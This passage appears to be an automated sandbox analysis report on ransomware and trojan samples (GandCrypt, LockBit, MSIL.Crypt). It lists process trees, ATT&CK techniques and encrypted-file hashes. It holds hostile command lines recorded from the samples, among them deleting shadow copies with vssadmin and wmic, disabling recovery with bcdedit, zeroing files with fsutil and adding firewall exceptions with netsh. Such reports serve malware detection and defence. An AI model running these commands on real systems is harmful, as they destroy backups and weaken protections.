    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9B1C0B51-DF9F-4F59-949C-517E6288FE02}'" delete
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-6753a843b7a94a0b468d985ef54bd03c5938d1d9414815d00041e07d872367d8.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-6753a843b7a94a0b468d985ef54bd03c5938d1d9414815d00041e07d872367d8.exe
    3⤵
    PID:280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 472
      4⤵
      Program crash
      PID:1968
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 488
      4⤵
      Program crash
      PID:6288
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9da4a0afc77b63a27fb7643652718624f9b0a69787bb28ceac8f8eb36dd1c30f.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9da4a0afc77b63a27fb7643652718624f9b0a69787bb28ceac8f8eb36dd1c30f.exe
    3⤵
    PID:2724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 472
      4⤵
      Program crash
      PID:2500
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Generic-09e467f53b89b6829b32bf1049a042caa86ae9c2224ad27eefe869ca7c7cb1ed.exe
    HEUR-Trojan-Ransom.Win32.Generic-09e467f53b89b6829b32bf1049a042caa86ae9c2224ad27eefe869ca7c7cb1ed.exe
    3⤵
    PID:5128
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Generic-297825a2b5c807cfa39bba869cb485d963baa2a5d848c525343c8bac518db1ff.exe
    HEUR-Trojan-Ransom.Win32.Generic-297825a2b5c807cfa39bba869cb485d963baa2a5d848c525343c8bac518db1ff.exe
    3⤵
    PID:1344
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
      4⤵
      PID:4296
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:7688
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:6284
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4552
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:9540
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit_Ransomware.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      PID:4012
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Generic-297825a2b5c807cfa39bba869cb485d963baa2a5d848c525343c8bac518db1ff.exe" & Del /f /q "C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Generic-297825a2b5c807cfa39bba869cb485d963baa2a5d848c525343c8bac518db1ff.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:9100
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.7 -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9632
    - - C:\Windows\SysWOW64\fsutil.exe
        
        fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Generic-297825a2b5c807cfa39bba869cb485d963baa2a5d848c525343c8bac518db1ff.exe"
        5⤵
        
        PID:852
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Generic-ed8cf99af3578c340af64fd54cb974547812d3690b43ffbe83ba0a54b581a8bc.exe
    HEUR-Trojan-Ransom.Win32.Generic-ed8cf99af3578c340af64fd54cb974547812d3690b43ffbe83ba0a54b581a8bc.exe
    3⤵
    PID:5784
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-fe4001facec6b10fcffbc15c021df89c247d692ae3debb274c43d5dad335280b.exe
    HEUR-Trojan-Ransom.Win32.PolyRansom.gen-fe4001facec6b10fcffbc15c021df89c247d692ae3debb274c43d5dad335280b.exe
    3⤵
    PID:6472
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-0186adc8b444936836fad0f245846774557890b6cea9e4a7d0fbb28faef5822a.exe
    HEUR-Trojan.MSIL.Crypt.gen-0186adc8b444936836fad0f245846774557890b6cea9e4a7d0fbb28faef5822a.exe
    3⤵
    PID:4696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com
      4⤵
      PID:6956
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com
      4⤵
      PID:5564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com
      4⤵
      PID:7712
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com
      4⤵
      PID:8784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8, 8.8.4.4, time.google.com
      4⤵
      PID:4356
  - - C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-0186adc8b444936836fad0f245846774557890b6cea9e4a7d0fbb28faef5822a.exe
      C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-0186adc8b444936836fad0f245846774557890b6cea9e4a7d0fbb28faef5822a.exe
      4⤵
      PID:5616
  - - C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-0186adc8b444936836fad0f245846774557890b6cea9e4a7d0fbb28faef5822a.exe
      C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Crypt.gen-0186adc8b444936836fad0f245846774557890b6cea9e4a7d0fbb28faef5822a.exe
      4⤵
      PID:8168
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "DNS Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmp3EEF.tmp"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9100
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "DNS Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4E9F.tmp"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3656
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-12d7d5a15a94fd40b4238aedaff6f28e858e4d9f4ec810e2692261cff23c867c.exe
    HEUR-Trojan.MSIL.Crypt.gen-12d7d5a15a94fd40b4238aedaff6f28e858e4d9f4ec810e2692261cff23c867c.exe
    3⤵
    PID:6756
  - - C:\Users\Admin\AppData\Local\Temp\Win32.exe
      "C:\Users\Admin\AppData\Local\Temp\Win32.exe"
      4⤵
      PID:6072
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Win32.exe" "Win32.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:1208
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-1d7a117563f8ea327d3488b6363652ea2f980068088edf630dca2def9fdade2a.exe
    HEUR-Trojan.MSIL.Crypt.gen-1d7a117563f8ea327d3488b6363652ea2f980068088edf630dca2def9fdade2a.exe
    3⤵
    PID:368
  - - C:\Users\Admin\AppData\Roaming\keyport.exe
      "C:\Users\Admin\AppData\Roaming\keyport.exe"
      4⤵
      PID:6016
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\keyport.exe" "keyport.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:3980
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-3ed6edb88cbdb1490fc50a5483a78a7d1ca2541f741ccac1a59e6fb390cbbb57.exe
    HEUR-Trojan.MSIL.Crypt.gen-3ed6edb88cbdb1490fc50a5483a78a7d1ca2541f741ccac1a59e6fb390cbbb57.exe
    3⤵
    PID:4864
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-42376e8bd719d6dbffd52918e6dc9e4b39ab9372962c730811e9cb135dfdcaa8.exe
    HEUR-Trojan.MSIL.Crypt.gen-42376e8bd719d6dbffd52918e6dc9e4b39ab9372962c730811e9cb135dfdcaa8.exe
    3⤵
    PID:6556
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-5303a2e021ddc8de2b82d6a3ce5e1fb09b39f6e301636b984f38f9e15b961514.exe
    HEUR-Trojan.MSIL.Crypt.gen-5303a2e021ddc8de2b82d6a3ce5e1fb09b39f6e301636b984f38f9e15b961514.exe
    3⤵
    PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\google.exe
      "C:\Users\Admin\AppData\Local\Temp\google.exe"
      4⤵
      PID:5296
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\google.exe" "google.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:8052
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-577a5d74827b6c85d03fd8f13a01317e760cc7c37d8e96cb2cbd887149265138.exe
    HEUR-Trojan.MSIL.Crypt.gen-577a5d74827b6c85d03fd8f13a01317e760cc7c37d8e96cb2cbd887149265138.exe
    3⤵
    PID:7848
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-6533e2585b066a12d702225cfd0ef1c731a13968303b1080b1dc4bbf289bd804.exe
    HEUR-Trojan.MSIL.Crypt.gen-6533e2585b066a12d702225cfd0ef1c731a13968303b1080b1dc4bbf289bd804.exe
    3⤵
    PID:9592
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-6e456fb6fe8a85eef4781781a2b73ae35fbc5da1637caa5b11430905e72d862d.exe
    HEUR-Trojan.MSIL.Crypt.gen-6e456fb6fe8a85eef4781781a2b73ae35fbc5da1637caa5b11430905e72d862d.exe
    3⤵
    PID:8280
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-6e456fb6fe8a85eef4781781a2b73ae35fbc5da1637caa5b11430905e72d862d.exe" "HEUR-Trojan.MSIL.Crypt.gen-6e456fb6fe8a85eef4781781a2b73ae35fbc5da1637caa5b11430905e72d862d.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:7164
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-84a01163b0583a82dd6c9f09b8fc88e4fd627bf96e72828bef3b762f89cba947.exe
    HEUR-Trojan.MSIL.Crypt.gen-84a01163b0583a82dd6c9f09b8fc88e4fd627bf96e72828bef3b762f89cba947.exe
    3⤵
    PID:4332
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-84a01163b0583a82dd6c9f09b8fc88e4fd627bf96e72828bef3b762f89cba947.exe" "HEUR-Trojan.MSIL.Crypt.gen-84a01163b0583a82dd6c9f09b8fc88e4fd627bf96e72828bef3b762f89cba947.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:3000
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-87a926c5a53509e268f937f425918a1735f2d0ec397191d99288ceea676bcd84.exe
    HEUR-Trojan.MSIL.Crypt.gen-87a926c5a53509e268f937f425918a1735f2d0ec397191d99288ceea676bcd84.exe
    3⤵
    PID:7896
  - - C:\Program Files (x86)\chrome.exe
      "C:\Program Files (x86)\chrome.exe"
      4⤵
      PID:8120
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-98db33ecca59ccddb9a19063f6a0ebf8994fa068c9405ca10daf46abe988deb7.exe
    HEUR-Trojan.MSIL.Crypt.gen-98db33ecca59ccddb9a19063f6a0ebf8994fa068c9405ca10daf46abe988deb7.exe
    3⤵
    PID:9360
  - - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-98db33ecca59ccddb9a19063f6a0ebf8994fa068c9405ca10daf46abe988deb7.exe
      C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-98db33ecca59ccddb9a19063f6a0ebf8994fa068c9405ca10daf46abe988deb7.exe
      4⤵
      PID:408
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        
        PID:7696
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 480
        6⤵
        Program crash
        
        PID:7928
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 476
        6⤵
        Program crash
        
        PID:6892
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-a421af644258b417724af65faed48db507a36acaf1cac91e9f384360044fd47c.exe
    HEUR-Trojan.MSIL.Crypt.gen-a421af644258b417724af65faed48db507a36acaf1cac91e9f384360044fd47c.exe
    3⤵
    PID:2028
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-cce6a07ca807865798a988e8072bded1d0d3b618f9c60082cfd2dc26c079d1ce.exe
    HEUR-Trojan.MSIL.Crypt.gen-cce6a07ca807865798a988e8072bded1d0d3b618f9c60082cfd2dc26c079d1ce.exe
    3⤵
    PID:832
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 944
      4⤵
      Program crash
      PID:3404
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-d1a65d61dc28b66ba619aac37e2c55118ab0746e580a358fad473ad26cd3862f.exe
    HEUR-Trojan.MSIL.Crypt.gen-d1a65d61dc28b66ba619aac37e2c55118ab0746e580a358fad473ad26cd3862f.exe
    3⤵
    PID:5932
  - - C:\Users\Admin\AppData\Local\Temp\ Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\ Explorer.exe"
      4⤵
      PID:5280
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\ Explorer.exe" " Explorer.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:7540
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-d8d4f1d80785d93db54808bd1e4c73e9c9ed1c53221b3ded884e4d4218784285.exe
    HEUR-Trojan.MSIL.Crypt.gen-d8d4f1d80785d93db54808bd1e4c73e9c9ed1c53221b3ded884e4d4218784285.exe
    3⤵
    PID:10192
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-e6c38be28466df123e7845a25831e25febd47311d15695ee7c83582360e32525.exe
    HEUR-Trojan.MSIL.Crypt.gen-e6c38be28466df123e7845a25831e25febd47311d15695ee7c83582360e32525.exe
    3⤵
    PID:3252
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Crypt.gen-f6f3753d5c38dfe46eda480efd5b7459f5e7f3220714ebb91319e31650658315.exe
    HEUR-Trojan.MSIL.Crypt.gen-f6f3753d5c38dfe46eda480efd5b7459f5e7f3220714ebb91319e31650658315.exe
    3⤵
    PID:3288
  - - C:\Users\Admin\AppData\Roaming\0.exe
      "C:\Users\Admin\AppData\Roaming\0.exe"
      4⤵
      PID:9848
  - - C:\Users\Admin\AppData\Roaming\1.exe
      "C:\Users\Admin\AppData\Roaming\1.exe"
      4⤵
      PID:7336
    - - C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        5⤵
        
        PID:8944
      - C:\windows\Scvhost.exe
        
        "C:\windows\Scvhost.exe"
        6⤵
        
        PID:1592
        
        C:\windows\Scvhost.exe
        
        "C:\windows\Scvhost.exe"
        7⤵
        
        PID:1952
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Cryptos.gen-719006ee4e41442949c2d875af25723d77c135a2354a1aea6fd26de46a243cb0.exe
    HEUR-Trojan.MSIL.Cryptos.gen-719006ee4e41442949c2d875af25723d77c135a2354a1aea6fd26de46a243cb0.exe
    3⤵
    PID:3336
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com
      4⤵
      PID:9112
  - - C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Cryptos.gen-719006ee4e41442949c2d875af25723d77c135a2354a1aea6fd26de46a243cb0.exe
      C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Cryptos.gen-719006ee4e41442949c2d875af25723d77c135a2354a1aea6fd26de46a243cb0.exe
      4⤵
      PID:7512
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8584
    - - C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Cryptos.gen-719006ee4e41442949c2d875af25723d77c135a2354a1aea6fd26de46a243cb0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.MSIL.Cryptos.gen-719006ee4e41442949c2d875af25723d77c135a2354a1aea6fd26de46a243cb0.exe"
        5⤵
        
        PID:9400
      - C:\Windows\SysWOW64\Windows\yerty.exe
        
        "C:\Windows\system32\Windows\yerty.exe"
        6⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com
        7⤵
        
        PID:5928
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.MSIL.Cryptos.gen-c71afddd08dff7a00dc6a44eef68e2aaa4ee21ac71b06238d8bfc35bacd2af65.exe
    HEUR-Trojan.MSIL.Cryptos.gen-c71afddd08dff7a00dc6a44eef68e2aaa4ee21ac71b06238d8bfc35bacd2af65.exe
    3⤵
    PID:3608
  - - C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe"
      4⤵
      PID:7284
    - - C:\Users\Admin\AppData\Roaming\Services.exe
        
        "C:\Users\Admin\AppData\Roaming\Services.exe"
        5⤵
        
        PID:5936
      - C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe"
        6⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Roaming\Services.exe
        
        "C:\Users\Admin\AppData\Roaming\Services.exe"
        7⤵
        
        PID:5488
    - - C:\Users\Admin\AppData\Roaming\Services.exe
        
        "C:\Users\Admin\AppData\Roaming\Services.exe"
        5⤵
        
        PID:5224
      - C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe"
        6⤵
        
        PID:9264
    - - C:\Users\Admin\AppData\Roaming\Services.exe
        
        "C:\Users\Admin\AppData\Roaming\Services.exe"
        5⤵
        
        PID:7668
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan.Win32.Crypt.gen-9bed30d0999b1424efc89e995ac0b7a46a268f994185c74b0e9ffe5d613d89ff.exe
    HEUR-Trojan.Win32.Crypt.gen-9bed30d0999b1424efc89e995ac0b7a46a268f994185c74b0e9ffe5d613d89ff.exe
    3⤵
    PID:9284
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c test.exe
      4⤵
      PID:756
    - - C:\Users\Admin\Desktop\00469\test.exe
        
        test.exe
        5⤵
        
        PID:5248
      - C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        6⤵
        
        PID:7280
      - C:\Users\Admin\Desktop\00469\test.exe
        
        test.exe
        6⤵
        
        PID:9508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "DNS Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD708.tmp"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8824
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /f /tn "DNS Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpDE8B.tmp"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8348
      - C:\Users\Admin\Desktop\00469\test.exe
        
        "C:\Users\Admin\Desktop\00469\test.exe" 2 9508 240833171
        6⤵
        
        PID:3516

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2712

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2724 -ip 2724
1⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 280 -ip 280
1⤵
PID:5960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 280 -ip 280
1⤵
PID:2476

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7696 -ip 7696
1⤵
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 7696 -ip 7696
1⤵
PID:8028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 832 -ip 832
1⤵
PID:8624

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x2f8
1⤵
PID:7580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:9160

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
PID:4944
- C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
  /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{8B6C1693-ED5D-490A-B504-923A311B5B98}.xps" 133723655864420000
  2⤵
  PID:8184

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d42d8898bbf8450c843a497af73b4a1b /t 8812 /p 4012
1⤵
PID:2760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6020 -ip 6020
1⤵
PID:10004

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Restore-My-Files.txt
1⤵
PID:1596

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\readme.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:6640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Proxy

T1090

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\Restore-My-Files.txt.2A4CBDCD9A5F9F49C53D723205E6CC953D00F85A5A014507B7B7189BD9DEE480

Filesize
528B

MD5
94220acea84ca4dc8b1ab989cd7bccd0

SHA1
9a9a935afad005aa5624c2dd746ab3d860fae762

SHA256
1f06fd340dd1265504472616f206988a6cd4c03d06f74e6b176c082162d929ba

SHA512
306f821007889cf7de61cba4167a31d142514f15f0eff8acf67d9871d70cc2b518aafcb511361a82ad911a5e6f874d1d7ef22e0ec23c0a4b95d15870a7d55573

Download Submit
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.2A4CBDCD9A5F9F49C53D723205E6CC953D00F85A5A014507B7B7189BD9DEE480

Filesize
32KB

MD5
e71f35e707be0ee54d71485c8579ab40

SHA1
da1466e51b9bcc35f4dcc9b1bc28487682715eca

SHA256
e02a1ea49bb18addd4fa858b19fa74e6138a6ca600174c55447de4f2d1fb8b86

SHA512
fe5f32b2f5bff84e2a3a7812bcaa58adf5d1410eaefa76a74193abfdc3ad0bb9444178049c1040e79fc26a71392463a34695ef2d099bb69a3a02640456d8a8b2

Download Submit
C:\Program Files (x86)\Common Files\Oracle\readme.txt.2A4CBDCD9A5F9F49C53D723205E6CC953D00F85A5A014507B7B7189BD9DEE480

Filesize
880B

MD5
34474c1a028e3b36f9dd0ad03d195861

SHA1
490b4571ee0b330d65266b9bc0cbb9c4534489f7

SHA256
33743b2c59007f93ba4e48a393887ebd096ca7028e07f34b390725fb5ab0301b

SHA512
9831543ad29bfd274a21ec7327117dea29909ad36e2f6769735f60a8367a186dbc2102ec371c2e2060ce58df8616ebb99115a31b1094841eebf15c4407d9ccc8

Download Submit
C:\Program Files\7-Zip\7-zip.chm.exe

Filesize
1.8MB

MD5
71d063154aea4c2b8c09df3e5e47a8b7

SHA1
66e8680a2c08675511f6e957b24537f929cad196

SHA256
d3a3a586a3df9b00b084689b2bc8e7f1291753f6ad7e05746b318cbc1cc53826

SHA512
5d43cb7cc3b9640eb788fdbe7dc3b039273c7a35cdfc6539ef5be1a1acf1a78a3ceca7c6f37bb48c413b48dca0354a2fe53d5d8b8437e6edbfafc51051a7edeb

Download Submit
C:\Program Files\dotnet\Restore-My-Files.txt

Filesize
512B

MD5
a91a93eee10ef702daa5038e00f2cc72

SHA1
1d9d3c9de1e1338825fe57900074c1c25f36a6ea

SHA256
6c6316495c93985d9bcb531e8759bd354402a87adcb02df05d3a3a7552d981d7

SHA512
5715b294472ba5397dd5231d834760ab6bc7b5c46c3a49819d233e25198269bc701c6655e95a527c812fd441de4d2c1fddb93963323107d4d0ff1ac09634ac6b

Download Submit
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\Restore-My-Files.txt

Filesize
528B

MD5
eff09426af0b9f1086519cb0f37f05e5

SHA1
d2a243047c9e2d1266c6480ff38dfb234997cbc6

SHA256
